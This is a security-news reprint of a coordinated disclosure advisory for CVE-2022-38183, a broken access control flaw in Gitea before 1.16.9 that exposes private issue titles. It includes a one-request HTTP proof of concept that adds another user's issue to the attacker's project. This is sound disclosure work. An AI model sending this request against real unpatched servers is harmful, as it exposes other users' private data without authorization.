Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-38183: usd-2022-0015 | Broken Access Control in Gitea - usd HeroLab

In Gitea before 1.16.9, it was possible for users to add existing issues to projects. Due to improper access controls, an attacker could assign any issue to any project in Gitea (there was no permission check for fetching the issue). As a result, the attacker would get access to private issue titles.

CVE
Open in Source
#csrf#vulnerability#web#windows#apple#linux#git#chrome#webkit

Advisory ID: usd-2022-0015
Product: Gitea
Affected Version: < 1.16.9
Vulnerability Type: CWE-284: Improper Access Control
Security Risk: Medium
Vendor URL: https://gitea.io/
Vendor Status: Fixed
Advisory Status: Closed
CVE number: Pending
CVE Link: Pending
First Published: 2022-08-12
Last Update: 2022-08-12

Description

Gitea is an open source project allowing users to host software development version control using Git. It was possible for users to add existing issues to projects. Due to improper access controls, an attacker could assign any issue to any project in Gitea. As a result, the attacker would get access to private issue titles.

Proof of Concept

The issue with ID 7 in the example below is an issue from a private repository of another user.
The project with ID 3 is the attackers project.

POST /testuser/test222/issues/projects HTTP/1.1 Host: localhost:3000 Content-Length: 85 sec-ch-ua: “Chromium";v="97", " Not;A Brand";v="99” Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 sec-ch-ua-platform: “Linux” Origin: http://localhost:3000 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: XXX Connection: close _csrf=tvK_ourfR_QjoYg7ZTI2i6NFAQM6MTY1NTc0OTYwMTExNjc3MzMwMA&action=&issue_ids=7&id=3

The attacker can see the issue (without body text).

Fix

It is recommended to restrict access to sensitive functions or information by default.
Required access privileges should be granted explicitly by a global access control mechanism.

References

  • https://cwe.mitre.org/data/definitions/284.html
  • https://blog.gitea.io/2022/07/gitea-1.16.9-is-released/

Timeline

  • 2022-06-22: vulnerability identified by Christian Pöschl
  • 2022-06-22: First contact request
  • 2022-07-01: Investigation started by vendor
  • 2022-07-12: Gitea 1.16.9 is released, the release notes include an acknowledgement: https://blog.gitea.io/2022/07/gitea-1.16.9-is-released/
  • 2022-07-15: Vendor confirms remediation
  • 2022-08-12: This advisory is published

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE